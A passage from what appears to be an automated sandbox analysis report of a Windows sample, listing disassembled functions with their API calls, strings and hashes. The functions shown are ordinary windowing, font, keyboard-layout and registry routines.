                                                                                                    • SetActiveWindow.USER32(00000000,03304283), ref: 0330426E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Active$LastMessagePopupRect
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3456420849-3887548279
                                                                                                    • Opcode ID: 03f484e9aa3b5d07af5212cab164a26e5d868e16f614dbf16b536f67709f11e9
                                                                                                    • Instruction ID: 4cdcd9724b8c19c57d80f3e48266337f68f6c75b7d0deda01d5b96108708d2d4
                                                                                                    • Opcode Fuzzy Hash: 03f484e9aa3b5d07af5212cab164a26e5d868e16f614dbf16b536f67709f11e9
                                                                                                    • Instruction Fuzzy Hash: EB51D775E10208AFDB04DBA9CD95FAEB7F9EB88300F144569EA00EB795D774AE408B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033019F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,03301B9B,?,02BED9D0,?,03301BFD,00000000,?,032ED247), ref: 03301A46
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 03301AAE
                                                                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,03301B57,?,80000002,00000000), ref: 03301AE8
                                                                                                    • RegCloseKey.ADVAPI32(?,03301B5E,00000000,?,00000100,00000000,03301B57,?,80000002,00000000), ref: 03301B51
                                                                                                    Strings
                                                                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 03301A98
                                                                                                    • layout text, xrefs: 03301ADF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                    • API String ID: 1703357764-2652665750
                                                                                                    • Opcode ID: 6d28035a6cb7c3d7615f7a00c84a2865c40437a885d2b6348e3a29c91e5936ee
                                                                                                    • Instruction ID: 6e8c05a9c4fad011f60cd97b50649725818cce9edb8bf237f4a8b6f9f2cfc426
                                                                                                    • Opcode Fuzzy Hash: 6d28035a6cb7c3d7615f7a00c84a2865c40437a885d2b6348e3a29c91e5936ee
                                                                                                    • Instruction Fuzzy Hash: 0D412878A102099FDB11DF54CD90BEEB7F8EB48340F6140E1E904EB291E770AE80DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03303E04 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 03303E18
                                                                                                    • IsWindowUnicode.USER32 ref: 03303E2C
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03303E4D
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 03303E63
                                                                                                    • TranslateMessage.USER32 ref: 03303EEC
                                                                                                    • DispatchMessageW.USER32 ref: 03303EF8
                                                                                                    • DispatchMessageA.USER32 ref: 03303F00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2190272339-0
                                                                                                    • Opcode ID: 69df914ab13fc3989738538f086a5c5871c9f274171a0ad747391b1dbe1a3eae
                                                                                                    • Instruction ID: 7f56cd4c35f35f31ef352c189bc99a384cff3c18733228b788a998edf0c42295
                                                                                                    • Opcode Fuzzy Hash: 69df914ab13fc3989738538f086a5c5871c9f274171a0ad747391b1dbe1a3eae
                                                                                                    • Instruction Fuzzy Hash: 0921373D70474026EA31EA2D0CD0BFFAAAD4FE2B64F1C4959F9819B1D1C7E5D4828226
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FD108 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032FD179
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 032FD18B
                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 032FD19E
                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 032FD1DE
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 032FD1F2
                                                                                                    • SetClassLongA.USER32(00000000,000000E6,?), ref: 032FD206
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 032FD222
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Long$Window$Class
                                                                                                    • String ID:
                                                                                                    • API String ID: 2026531576-0
                                                                                                    • Opcode ID: 257c646007cb723966b6e68d532da0d9b2a613c5f156d095a1d25c2af60f9534
                                                                                                    • Instruction ID: 644d28a6f85ee05c08711810c1d5d59accb13e9581a2af601b854f9fa72e3430
                                                                                                    • Opcode Fuzzy Hash: 257c646007cb723966b6e68d532da0d9b2a613c5f156d095a1d25c2af60f9534
                                                                                                    • Instruction Fuzzy Hash: 6221C029228342AFCA11F63C8C44AAFFB995FC1250F084B24F6959F2D2CBB4D8D5C751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03301D3C Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 03301D91
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 03301D9E
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 03301DB4
                                                                                                      • Part of subcall function 032D2530: MulDiv.KERNEL32(00000000,?,00000048), ref: 032D253D
                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 03301DDD
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 03301DED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 03301E06
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 03301E2C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2891467149-0
                                                                                                    • Opcode ID: 336675e588be148fb00e905712093704cd020c8a344d13d4f9d751309ee79695
                                                                                                    • Instruction ID: 5506f4bb9f42a20dbd93fe2b15ebb6bd57ce66a95e1870b9d2ae1b81518d062a
                                                                                                    • Opcode Fuzzy Hash: 336675e588be148fb00e905712093704cd020c8a344d13d4f9d751309ee79695
                                                                                                    • Instruction Fuzzy Hash: D0319238A143459BE754FB68CD95BA973E8AB44300F0484B1A948CF2A5DBB0D985CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03306C88 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032BC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,032BC9F2), ref: 032BC95E
                                                                                                      • Part of subcall function 032BC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,032BC9D5,?,00000000,?,00000000,032BC9F2), ref: 032BC993
                                                                                                      • Part of subcall function 032BC91C: VerQueryValueA.VERSION(?,032BCA04,?,?,00000000,?,00000000,?,00000000,032BC9D5,?,00000000,?,00000000,032BC9F2), ref: 032BC9AD
                                                                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 03306CBC
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 03306CCD
                                                                                                    • ImageList_Write.COMCTL32(00000000,?,00000000,03306D82), ref: 03306D4C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                    • API String ID: 4063495462-3125200627
                                                                                                    • Opcode ID: a2456b2e23899a7bd51e93feb2015d4eccdbe865438d50bef730c969a0cf0c59
                                                                                                    • Instruction ID: 42d6ce5cd861d1c174bafb0c7b96b6c1de6f29066bd77092ccbff40459864273
                                                                                                    • Opcode Fuzzy Hash: a2456b2e23899a7bd51e93feb2015d4eccdbe865438d50bef730c969a0cf0c59
                                                                                                    • Instruction Fuzzy Hash: 6621A1742207409FE714FB7ADCE6BA977BCDB41B40F144029F811EB2C9D6B2A9509F20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E3020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardLayoutNameA.USER32(00000000), ref: 032E3048
                                                                                                      • Part of subcall function 032D02BC: RegCloseKey.ADVAPI32(10940000,032D0198,00000001,032D023A,?,?,032D76D2,00000008,00000060,00000048,00000000,032D7777), ref: 032D02D0
                                                                                                      • Part of subcall function 032D0320: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
                                                                                                      • Part of subcall function 032BDC04: SetErrorMode.KERNEL32 ref: 032BDC0E
                                                                                                      • Part of subcall function 032BDC04: LoadLibraryA.KERNEL32(00000000,00000000,032BDC58,?,00000000,032BDC76), ref: 032BDC3D
                                                                                                    • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 032E30D9
                                                                                                    • FreeLibrary.KERNEL32(?,032E3113,?,00000000,032E3153), ref: 032E3106
                                                                                                    Strings
                                                                                                    • Layout File, xrefs: 032E30A5
                                                                                                    • KbdLayerDescriptor, xrefs: 032E30D0
                                                                                                    • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 032E308D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                                                    • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                    • API String ID: 3365787578-2194312379
                                                                                                    • Opcode ID: 8ba846377d851c12c3afae8a68413563aa3eb088c6b22035885ed69c4f01f63e
                                                                                                    • Instruction ID: c0580471e2cc92cf1e1d1eb28c46f627546dfc3df19e462df6c802b6dcdf6aff
                                                                                                    • Opcode Fuzzy Hash: 8ba846377d851c12c3afae8a68413563aa3eb088c6b22035885ed69c4f01f63e
                                                                                                    • Instruction Fuzzy Hash: A021927CE20348AFCF01EFA4C8519DEB7BAFB49700F508464E510AB710D7789985CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DB190 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB1E8
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB1FD
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB208
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB232
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                                                                    • API String ID: 2545840971-2774842281
                                                                                                    • Opcode ID: 6aafcf23d88f35272eebfba86ff3474c9c88be2a8b041eceaa2c517e78fd2065
                                                                                                    • Instruction ID: f473c21fb7b9f7452aa363b6bef41a87308bf36b1874410924870a3b05b03fd4
                                                                                                    • Opcode Fuzzy Hash: 6aafcf23d88f35272eebfba86ff3474c9c88be2a8b041eceaa2c517e78fd2065
                                                                                                    • Instruction Fuzzy Hash: EC11B1726113055FE720DF689898BABB7ECEF06710F01852DED8B87640D7B0A4848BE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DB0BC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB114
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB129
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB134
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB15E
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                                                                    • API String ID: 2545840971-1370492664
                                                                                                    • Opcode ID: ee6e29632e0ede4e3476d54e63f995824e93b6f63274986d392dc502093f8b6a
                                                                                                    • Instruction ID: 9ac274d52c6ca519b585ac2952e2a17799dd5fe389b547652e7dbff82434ab9b
                                                                                                    • Opcode Fuzzy Hash: ee6e29632e0ede4e3476d54e63f995824e93b6f63274986d392dc502093f8b6a
                                                                                                    • Instruction Fuzzy Hash: 8711D3766143499FE720DF699C84BA7B7ECEF05B51F014529ED5797240D3B0E484CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D4E8C Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D3CB4: GetObjectA.GDI32(?,00000004), ref: 032D3CCB
                                                                                                      • Part of subcall function 032D3CB4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 032D3CEE
                                                                                                    • GetDC.USER32(00000000), ref: 032D4ECA
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 032D4ED6
                                                                                                    • SelectObject.GDI32(?), ref: 032D4EE3
                                                                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,032D4F3B,?,?,?,?,00000000), ref: 032D4F07
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D4F21
                                                                                                    • DeleteDC.GDI32(?), ref: 032D4F2A
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D4F35
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 4046155103-0
                                                                                                    • Opcode ID: 5b360b366d8c0e3ba9cc3638ae0f5b3b36151fe7fd78c22e1f6eba240d890173
                                                                                                    • Instruction ID: 91f74bcafe5d2dd7dec6a64219b8140b16486eb7fa5851f728d5abbd183bc3ee
                                                                                                    • Opcode Fuzzy Hash: 5b360b366d8c0e3ba9cc3638ae0f5b3b36151fe7fd78c22e1f6eba240d890173
                                                                                                    • Instruction Fuzzy Hash: 8E115176E143496FDB10EBE8CC50EEEB3BCFB08740F4144A5B604DB250DAB499808750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03301CA0 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32 ref: 03301CBB
                                                                                                    • WindowFromPoint.USER32(?,?), ref: 03301CC8
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 03301CD6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03301CDD
                                                                                                    • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 03301D06
                                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 03301D18
                                                                                                    • SetCursor.USER32(00000000), ref: 03301D2A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1770779139-0
                                                                                                    • Opcode ID: 45e9bd681223f8b42be8e94c5246bdc568ae7b26ec29ea122a9f3bcb04f0fc47
                                                                                                    • Instruction ID: 1745c25757c11f0bcb4a3593470004af844d83b0e167c5f9d50a83a23d99f90a
                                                                                                    • Opcode Fuzzy Hash: 45e9bd681223f8b42be8e94c5246bdc568ae7b26ec29ea122a9f3bcb04f0fc47
                                                                                                    • Instruction Fuzzy Hash: E601D22E51430075CA20EB688CC4BBB76B9DFC0B80F14445AFA849A191E665CC409326
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BBFC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032BBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
                                                                                                      • Part of subcall function 032BBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
                                                                                                      • Part of subcall function 032BBE3C: GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
                                                                                                      • Part of subcall function 032BBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
                                                                                                    • CharToOemA.USER32(?,?), ref: 032BBFFB
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 032BC018
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC01E
                                                                                                    • GetStdHandle.KERNEL32(000000F4,032BC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC033
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,032BC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC039
                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 032BC05B
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 032BC071
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 185507032-0
                                                                                                    • Opcode ID: 74046fb7291a68ed8cb1e0ace04cb32076ade0769b4b13a4eac8d54a33a2d8a7
                                                                                                    • Instruction ID: ec40ec7147b8ff34ce03f0469c275ff43f1551061ed26ff462a4895ea3bb860a
                                                                                                    • Opcode Fuzzy Hash: 74046fb7291a68ed8cb1e0ace04cb32076ade0769b4b13a4eac8d54a33a2d8a7
                                                                                                    • Instruction Fuzzy Hash: 70115EBA1283006AD200F7A8CC85FDF77FC9B55780F404A19B754DB1D1DAB1E9848772
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FCA84 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FillRect.USER32(?,?), ref: 032FCAFD
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 032FCB28
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032FCB47
                                                                                                      • Part of subcall function 032FC9F8: CallWindowProcA.USER32(?,?,?,?,?), ref: 032FCA32
                                                                                                    • BeginPaint.USER32(?,?), ref: 032FCBBF
                                                                                                    • GetWindowRect.USER32(?,?), ref: 032FCBEC
                                                                                                    • EndPaint.USER32(?,?,032FCC60), ref: 032FCC4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 901200654-0
                                                                                                    • Opcode ID: efd01d8176d7a0ff4bb95a7288e37b286c5bc9cf3b031c3dd43cee9834525993
                                                                                                    • Instruction ID: 01342145df41e5eed349d52c1353e024a2cc53e76effc608c8f69c7470044e77
                                                                                                    • Opcode Fuzzy Hash: efd01d8176d7a0ff4bb95a7288e37b286c5bc9cf3b031c3dd43cee9834525993
                                                                                                    • Instruction Fuzzy Hash: 3A51E479A2420DEFCB10EFA8C588E9DF7F8AF08710F1581A5E508EB251C774AA85DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BF8F8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032BF991
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032BF9AD
                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 032BF9E6
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032BFA63
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 032BFA7C
                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 032BFAB1
                                                                                                    Memory Dump Source
